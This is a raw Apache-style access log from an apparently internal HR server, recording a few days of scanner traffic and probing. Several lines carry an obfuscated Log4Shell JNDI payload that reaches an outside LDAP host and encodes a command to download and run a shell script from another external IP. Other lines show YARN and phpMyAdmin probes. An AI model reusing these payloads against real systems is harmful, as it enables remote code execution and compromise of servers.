192.168.11.226 - - [29/Apr/2023:17:00:45 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 4089 "http://192.168.1.81:8088/eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
192.168.11.226 - - [29/Apr/2023:17:00:45 +0800] "POST /eHR/ess/redirect.php?scriptname=ESNE001&appdesc=%E6%89%B9%E9%87%8F%E5%8A%A0%E7%8F%AD%E7%94%B3%E8%AB%8B HTTP/1.1" 200 4089
198.235.24.247 - - [29/Apr/2023:18:18:45 +0800] "GET / HTTP/1.1" 200 397 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
198.235.24.247 - - [29/Apr/2023:18:18:45 +0800] "GET / HTTP/1.1" 200 397
78.128.114.14 - - [29/Apr/2023:18:19:14 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232
78.128.114.14 - - [29/Apr/2023:18:19:14 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232 "-" "python-requests/2.27.1"
91.223.169.83 - - [29/Apr/2023:18:49:46 +0800] "\x16\x03\x01" 501 205 "-" "-"
91.223.169.83 - - [29/Apr/2023:18:49:46 +0800] "\x16\x03\x01" 501 205
95.214.55.244 - - [29/Apr/2023:18:53:50 +0800] "GET / HTTP/1.1" 200 397
95.214.55.244 - - [29/Apr/2023:18:53:50 +0800] "GET / HTTP/1.1" 200 397 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//107.189.4.234:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL3VwZGF0ZS5zaCA7IGN1cmwgLU8gaHR0cDovLzEwNy4xNzIuMjA2LjExNC8uZHVjay91cGRhdGUuc2ggOyBzaCB1cGRhdGUuc2g=}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//107.189.4.234:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL3VwZGF0ZS5zaCA7IGN1cmwgLU8gaHR0cDovLzEwNy4xNzIuMjA2LjExNC8uZHVjay91cGRhdGUuc2ggOyBzaCB1cGRhdGUuc2g=}')"
78.128.114.14 - - [29/Apr/2023:19:46:10 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232 "-" "python-requests/2.27.1"
78.128.114.14 - - [29/Apr/2023:19:46:10 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232
198.199.93.15 - - [29/Apr/2023:20:20:12 +0800] "MGLNDD_222.92.19.198_8088" 501 227 "-" "-"
198.199.93.15 - - [29/Apr/2023:20:20:12 +0800] "MGLNDD_222.92.19.198_8088" 501 227
123.160.221.17 - - [29/Apr/2023:22:18:40 +0800] "\x16\x03\x01" 501 205 "-" "-"
123.160.221.17 - - [29/Apr/2023:22:18:40 +0800] "\x16\x03\x01" 501 205
123.160.221.17 - - [29/Apr/2023:22:18:51 +0800] "GET / HTTP/1.1" 200 397
123.160.221.17 - - [29/Apr/2023:22:18:51 +0800] "GET / HTTP/1.1" 200 397 "-" "curl/7.64.1"
211.95.50.5 - - [29/Apr/2023:22:19:01 +0800] "GET / HTTP/1.1" 200 397 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
211.95.50.5 - - [29/Apr/2023:22:19:01 +0800] "GET / HTTP/1.1" 200 397
36.99.136.136 - - [29/Apr/2023:22:19:01 +0800] "GET / HTTP/1.1" 200 397 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
36.99.136.136 - - [29/Apr/2023:22:19:01 +0800] "GET / HTTP/1.1" 200 397
211.95.50.5 - - [29/Apr/2023:22:19:01 +0800] "GET /favicon.ico HTTP/1.1" 404 209
211.95.50.5 - - [29/Apr/2023:22:19:01 +0800] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
36.99.136.136 - - [29/Apr/2023:22:19:01 +0800] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
36.99.136.136 - - [29/Apr/2023:22:19:01 +0800] "GET /favicon.ico HTTP/1.1" 404 209
111.7.96.171 - - [29/Apr/2023:22:19:14 +0800] "GET / HTTP/1.1" 200 397 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
111.7.96.171 - - [29/Apr/2023:22:19:14 +0800] "GET / HTTP/1.1" 200 397
111.7.96.171 - - [29/Apr/2023:22:19:14 +0800] "GET /favicon.ico HTTP/1.1" 404 209
111.7.96.171 - - [29/Apr/2023:22:19:14 +0800] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
36.99.136.129 - - [29/Apr/2023:22:21:15 +0800] "GET / HTTP/1.1" 200 397 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
36.99.136.129 - - [29/Apr/2023:22:21:15 +0800] "GET / HTTP/1.1" 200 397
36.99.136.129 - - [29/Apr/2023:22:21:15 +0800] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
36.99.136.129 - - [29/Apr/2023:22:21:15 +0800] "GET /favicon.ico HTTP/1.1" 404 209
36.99.136.136 - - [29/Apr/2023:22:21:44 +0800] "GET / HTTP/1.1" 200 397
36.99.136.136 - - [29/Apr/2023:22:21:44 +0800] "GET / HTTP/1.1" 200 397 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
36.99.136.136 - - [29/Apr/2023:22:21:44 +0800] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
36.99.136.136 - - [29/Apr/2023:22:21:44 +0800] "GET /favicon.ico HTTP/1.1" 404 209
51.250.100.8 - - [29/Apr/2023:23:06:39 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232 "-" "python-requests/2.27.1"
51.250.100.8 - - [29/Apr/2023:23:06:39 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232
185.225.74.193 - - [30/Apr/2023:00:21:45 +0800] "GET / HTTP/1.0" 200 397 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.225.74.193 - - [30/Apr/2023:00:21:45 +0800] "GET / HTTP/1.0" 200 397
95.214.55.244 - - [30/Apr/2023:00:21:51 +0800] "GET / HTTP/1.1" 200 397 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//107.189.4.234:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL3VwZGF0ZS5zaCA7IGN1cmwgLU8gaHR0cDovLzEwNy4xNzIuMjA2LjExNC8uZHVjay91cGRhdGUuc2ggOyBzaCB1cGRhdGUuc2g=}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//107.189.4.234:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL3VwZGF0ZS5zaCA7IGN1cmwgLU8gaHR0cDovLzEwNy4xNzIuMjA2LjExNC8uZHVjay91cGRhdGUuc2ggOyBzaCB1cGRhdGUuc2g=}')"
95.214.55.244 - - [30/Apr/2023:00:21:51 +0800] "GET / HTTP/1.1" 200 397
44.233.146.217 - - [30/Apr/2023:01:10:21 +0800] "GET /ws/v1/cluster HTTP/1.1" 404 211
44.233.146.217 - - [30/Apr/2023:01:10:21 +0800] "GET /ws/v1/cluster HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
44.233.146.217 - - [30/Apr/2023:01:10:21 +0800] "GET / HTTP/1.1" 200 397 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
44.233.146.217 - - [30/Apr/2023:01:10:21 +0800] "GET / HTTP/1.1" 200 397
193.35.18.53 - - [30/Apr/2023:01:27:15 +0800] "GET / HTTP/1.0" 200 397 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
193.35.18.53 - - [30/Apr/2023:01:27:15 +0800] "GET / HTTP/1.0" 200 397
205.210.31.12 - - [30/Apr/2023:02:16:50 +0800] "GET / HTTP/1.0" 200 397
205.210.31.12 - - [30/Apr/2023:02:16:50 +0800] "GET / HTTP/1.0" 200 397 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
66.42.71.147 - - [30/Apr/2023:02:18:18 +0800] "GET / HTTP/1.0" 200 397 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
66.42.71.147 - - [30/Apr/2023:02:18:18 +0800] "GET / HTTP/1.0" 200 397
198.235.24.184 - - [30/Apr/2023:03:45:13 +0800] "GET / HTTP/1.1" 200 397 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
198.235.24.184 - - [30/Apr/2023:03:45:13 +0800] "GET / HTTP/1.1" 200 397
152.89.196.222 - - [30/Apr/2023:03:49:08 +0800] "GET / HTTP/1.1" 200 397
152.89.196.222 - - [30/Apr/2023:03:49:08 +0800] "GET / HTTP/1.1" 200 397 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.225.74.193 - - [30/Apr/2023:04:01:57 +0800] "GET / HTTP/1.0" 200 397 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.225.74.193 - - [30/Apr/2023:04:01:57 +0800] "GET / HTTP/1.0" 200 397
205.210.31.96 - - [30/Apr/2023:05:32:41 +0800] "\x16\x03\x01" 501 205 "-" "-"
205.210.31.96 - - [30/Apr/2023:05:32:41 +0800] "\x16\x03\x01" 501 205
167.94.138.52 - - [30/Apr/2023:05:52:35 +0800] "GET / HTTP/1.1" 200 397 "-" "-"
167.94.138.52 - - [30/Apr/2023:05:52:35 +0800] "GET / HTTP/1.1" 200 397
167.94.138.52 - - [30/Apr/2023:05:52:35 +0800] "GET / HTTP/1.1" 200 397 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.52 - - [30/Apr/2023:05:52:35 +0800] "GET / HTTP/1.1" 200 397
167.94.138.52 - - [30/Apr/2023:05:52:36 +0800] "PRI * HTTP/2.0" 400 226 "-" "-"
167.94.138.52 - - [30/Apr/2023:05:52:36 +0800] "PRI * HTTP/2.0" 400 226
167.94.138.52 - - [30/Apr/2023:05:52:36 +0800] "GET /favicon.ico HTTP/1.1" 404 209
167.94.138.52 - - [30/Apr/2023:05:52:36 +0800] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.126 - - [30/Apr/2023:07:15:15 +0800] "GET / HTTP/1.1" 200 397 "-" "-"
167.248.133.126 - - [30/Apr/2023:07:15:15 +0800] "GET / HTTP/1.1" 200 397
167.248.133.126 - - [30/Apr/2023:07:15:15 +0800] "GET / HTTP/1.1" 200 397 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.126 - - [30/Apr/2023:07:15:15 +0800] "GET / HTTP/1.1" 200 397
167.248.133.126 - - [30/Apr/2023:07:15:16 +0800] "PRI * HTTP/2.0" 400 226 "-" "-"
167.248.133.126 - - [30/Apr/2023:07:15:16 +0800] "PRI * HTTP/2.0" 400 226
167.248.133.126 - - [30/Apr/2023:07:15:16 +0800] "GET /favicon.ico HTTP/1.1" 404 209
167.248.133.126 - - [30/Apr/2023:07:15:16 +0800] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
78.128.114.14 - - [30/Apr/2023:07:43:25 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232
78.128.114.14 - - [30/Apr/2023:07:43:25 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232 "-" "python-requests/2.27.1"
162.142.125.11 - - [30/Apr/2023:07:55:12 +0800] "GET / HTTP/1.1" 200 397 "-" "-"
162.142.125.11 - - [30/Apr/2023:07:55:12 +0800] "GET / HTTP/1.1" 200 397
162.142.125.11 - - [30/Apr/2023:07:55:12 +0800] "GET / HTTP/1.1" 200 397 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.11 - - [30/Apr/2023:07:55:12 +0800] "GET / HTTP/1.1" 200 397
162.142.125.11 - - [30/Apr/2023:07:55:13 +0800] "PRI * HTTP/2.0" 400 226 "-" "-"
162.142.125.11 - - [30/Apr/2023:07:55:13 +0800] "PRI * HTTP/2.0" 400 226
162.142.125.11 - - [30/Apr/2023:07:55:13 +0800] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.11 - - [30/Apr/2023:07:55:13 +0800] "GET /favicon.ico HTTP/1.1" 404 209
164.90.196.209 - - [30/Apr/2023:08:31:13 +0800] "GET / HTTP/1.0" 200 397 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
164.90.196.209 - - [30/Apr/2023:08:31:13 +0800] "GET / HTTP/1.0" 200 397
78.128.114.14 - - [30/Apr/2023:09:09:22 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232
78.128.114.14 - - [30/Apr/2023:09:09:22 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232 "-" "python-requests/2.27.1"
78.128.114.14 - - [30/Apr/2023:10:42:51 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232
78.128.114.14 - - [30/Apr/2023:10:42:51 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232 "-" "python-requests/2.27.1"
185.225.74.193 - - [30/Apr/2023:11:18:26 +0800] "GET / HTTP/1.0" 200 397 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.225.74.193 - - [30/Apr/2023:11:18:26 +0800] "GET / HTTP/1.0" 200 397
95.214.55.244 - - [30/Apr/2023:12:14:36 +0800] "GET / HTTP/1.1" 200 397
95.214.55.244 - - [30/Apr/2023:12:14:36 +0800] "GET / HTTP/1.1" 200 397 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.152.113.109:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL3VwZGF0ZS5zaCA7IGN1cmwgLU8gaHR0cDovLzEwNy4xNzIuMjA2LjExNC8uZHVjay91cGRhdGUuc2ggOyBzaCB1cGRhdGUuc2g=}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.152.113.109:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL3VwZGF0ZS5zaCA7IGN1cmwgLU8gaHR0cDovLzEwNy4xNzIuMjA2LjExNC8uZHVjay91cGRhdGUuc2ggOyBzaCB1cGRhdGUuc2g=}')"
178.159.37.98 - - [30/Apr/2023:12:49:19 +0800] "\x03" 501 203 "-" "-"
178.159.37.98 - - [30/Apr/2023:12:49:19 +0800] "\x03" 501 203
185.225.74.193 - - [30/Apr/2023:13:02:10 +0800] "GET / HTTP/1.0" 200 397 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.225.74.193 - - [30/Apr/2023:13:02:10 +0800] "GET / HTTP/1.0" 200 397
185.225.74.193 - - [30/Apr/2023:15:02:59 +0800] "GET / HTTP/1.0" 200 397 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.225.74.193 - - [30/Apr/2023:15:02:59 +0800] "GET / HTTP/1.0" 200 397
178.159.37.98 - - [30/Apr/2023:16:08:32 +0800] "\x03" 501 203 "-" "-"
178.159.37.98 - - [30/Apr/2023:16:08:32 +0800] "\x03" 501 203
223.111.175.21 - - [30/Apr/2023:17:43:43 +0800] "GET / HTTP/1.1" 200 397 "-" "curl/7.29.0"
223.111.175.21 - - [30/Apr/2023:17:43:43 +0800] "GET / HTTP/1.1" 200 397
223.111.175.21 - - [30/Apr/2023:17:43:44 +0800] "\x16\x03\x01" 501 205
223.111.175.21 - - [30/Apr/2023:17:43:44 +0800] "\x16\x03\x01" 501 205 "-" "-"
51.250.100.8 - - [30/Apr/2023:18:37:51 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232
51.250.100.8 - - [30/Apr/2023:18:37:51 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232 "-" "python-requests/2.27.1"
164.90.196.209 - - [30/Apr/2023:18:49:57 +0800] "GET / HTTP/1.0" 200 397 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
164.90.196.209 - - [30/Apr/2023:18:49:57 +0800] "GET / HTTP/1.0" 200 397
89.248.165.7 - - [30/Apr/2023:19:20:37 +0800] "\x03" 501 203 "-" "-"
89.248.165.7 - - [30/Apr/2023:19:20:37 +0800] "\x03" 501 203
78.128.114.14 - - [30/Apr/2023:19:23:01 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232
78.128.114.14 - - [30/Apr/2023:19:23:01 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232 "-" "python-requests/2.27.1"
193.142.146.214 - - [30/Apr/2023:19:29:43 +0800] "GET / HTTP/1.0" 200 397 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
193.142.146.214 - - [30/Apr/2023:19:29:43 +0800] "GET / HTTP/1.0" 200 397
106.75.29.156 - - [30/Apr/2023:19:36:35 +0800] "GET / HTTP/1.1" 200 397 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 8_2_2) AppleWebKit/553.37 (KHTML, like Gecko) Chrome/56.0.2120 Safari/537.36"
106.75.29.156 - - [30/Apr/2023:19:36:35 +0800] "GET / HTTP/1.1" 200 397
106.75.29.156 - - [30/Apr/2023:19:36:35 +0800] "GET /favicon.ico HTTP/1.1" 404 209
106.75.29.156 - - [30/Apr/2023:19:36:35 +0800] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/542.37 (KHTML, like Gecko) Chrome/69.0.1611 Safari/537.36"
106.75.29.156 - - [30/Apr/2023:19:36:35 +0800] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows NT 9_2_2; Win64; x64) AppleWebKit/572.44 (KHTML, like Gecko) Chrome/70.0.1901 Safari/537.36"
106.75.29.156 - - [30/Apr/2023:19:36:35 +0800] "GET /robots.txt HTTP/1.1" 404 208
106.75.29.156 - - [30/Apr/2023:19:36:35 +0800] "GET /sitemap.xml HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 8_1_1) AppleWebKit/590.38 (KHTML, like Gecko) Chrome/55.0.1625 Safari/537.36"
106.75.29.156 - - [30/Apr/2023:19:36:35 +0800] "GET /sitemap.xml HTTP/1.1" 404 209
106.75.29.156 - - [30/Apr/2023:19:36:36 +0800] "GET /axis2-admin/ HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
106.75.29.156 - - [30/Apr/2023:19:36:36 +0800] "GET /axis2-admin/ HTTP/1.1" 404 210
106.75.29.156 - - [30/Apr/2023:19:36:36 +0800] "GET /axis2/ HTTP/1.1" 404 204
106.75.29.156 - - [30/Apr/2023:19:36:36 +0800] "GET /axis2/ HTTP/1.1" 404 204 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
106.75.29.156 - - [30/Apr/2023:19:36:36 +0800] "GET /axis2/axis2-admin/ HTTP/1.1" 404 216 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
106.75.29.156 - - [30/Apr/2023:19:36:36 +0800] "GET /axis2/axis2-admin/ HTTP/1.1" 404 216
106.75.29.156 - - [30/Apr/2023:19:36:36 +0800] "GET /pma/index.php HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
106.75.29.156 - - [30/Apr/2023:19:36:36 +0800] "GET /pma/index.php HTTP/1.1" 404 211
106.75.29.156 - - [30/Apr/2023:19:36:36 +0800] "GET /phpmyadmin/index.php HTTP/1.1" 404 218
106.75.29.156 - - [30/Apr/2023:19:36:36 +0800] "GET /phpmyadmin/index.php HTTP/1.1" 404 218 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
106.75.29.156 - - [30/Apr/2023:19:36:36 +0800] "GET /PhpMyAdmin/index.php HTTP/1.1" 404 218
106.75.29.156 - - [30/Apr/2023:19:36:36 +0800] "GET /PhpMyAdmin/index.php HTTP/1.1" 404 218 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
106.75.29.156 - - [30/Apr/2023:19:36:36 +0800] "GET /php/thinkphp/aaaffff123.php HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
106.75.29.156 - - [30/Apr/2023:19:36:36 +0800] "GET /php/thinkphp/aaaffff123.php HTTP/1.1" 404 225
106.75.29.156 - - [30/Apr/2023:19:36:36 +0800] "GET /index_sso.php HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
106.75.29.156 - - [30/Apr/2023:19:36:36 +0800] "GET /index_sso.php HTTP/1.1" 404 211
95.214.55.244 - - [30/Apr/2023:19:38:43 +0800] "GET / HTTP/1.1" 200 397 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.152.113.109:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL3VwZGF0ZS5zaCA7IGN1cmwgLU8gaHR0cDovLzEwNy4xNzIuMjA2LjExNC8uZHVjay91cGRhdGUuc2ggOyBzaCB1cGRhdGUuc2g=}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.152.113.109:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL3VwZGF0ZS5zaCA7IGN1cmwgLU8gaHR0cDovLzEwNy4xNzIuMjA2LjExNC8uZHVjay91cGRhdGUuc2ggOyBzaCB1cGRhdGUuc2g=}')"
95.214.55.244 - - [30/Apr/2023:19:38:43 +0800] "GET / HTTP/1.1" 200 397
193.142.146.214 - - [30/Apr/2023:19:40:24 +0800] "GET / HTTP/1.0" 200 397
193.142.146.214 - - [30/Apr/2023:19:40:24 +0800] "GET / HTTP/1.0" 200 397 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
193.142.146.214 - - [30/Apr/2023:19:43:31 +0800] "GET / HTTP/1.0" 200 397 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
193.142.146.214 - - [30/Apr/2023:19:43:31 +0800] "GET / HTTP/1.0" 200 397
193.142.146.214 - - [30/Apr/2023:19:52:36 +0800] "GET / HTTP/1.0" 200 397 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
193.142.146.214 - - [30/Apr/2023:19:52:36 +0800] "GET / HTTP/1.0" 200 397
193.142.146.214 - - [30/Apr/2023:19:55:43 +0800] "GET / HTTP/1.0" 200 397 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
193.142.146.214 - - [30/Apr/2023:19:55:43 +0800] "GET / HTTP/1.0" 200 397
193.142.146.214 - - [30/Apr/2023:19:59:05 +0800] "GET / HTTP/1.0" 200 397 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
193.142.146.214 - - [30/Apr/2023:19:59:05 +0800] "GET / HTTP/1.0" 200 397
78.128.114.14 - - [30/Apr/2023:20:49:16 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232
78.128.114.14 - - [30/Apr/2023:20:49:16 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232 "-" "python-requests/2.27.1"
193.142.146.214 - - [30/Apr/2023:21:04:14 +0800] "GET / HTTP/1.0" 200 397 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
193.142.146.214 - - [30/Apr/2023:21:04:14 +0800] "GET / HTTP/1.0" 200 397
51.250.100.8 - - [30/Apr/2023:23:09:49 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232
51.250.100.8 - - [30/Apr/2023:23:09:49 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232 "-" "python-requests/2.27.1"
95.214.55.244 - - [30/Apr/2023:23:50:43 +0800] "GET / HTTP/1.1" 200 397 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.152.113.109:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL3VwZGF0ZS5zaCA7IGN1cmwgLU8gaHR0cDovLzEwNy4xNzIuMjA2LjExNC8uZHVjay91cGRhdGUuc2ggOyBzaCB1cGRhdGUuc2g=}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.152.113.109:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL3VwZGF0ZS5zaCA7IGN1cmwgLU8gaHR0cDovLzEwNy4xNzIuMjA2LjExNC8uZHVjay91cGRhdGUuc2ggOyBzaCB1cGRhdGUuc2g=}')"
95.214.55.244 - - [30/Apr/2023:23:50:43 +0800] "GET / HTTP/1.1" 200 397
78.128.114.14 - - [01/May/2023:01:04:18 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232
78.128.114.14 - - [01/May/2023:01:04:18 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232 "-" "python-requests/2.27.1"
78.128.114.14 - - [01/May/2023:02:28:54 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232 "-" "python-requests/2.27.1"
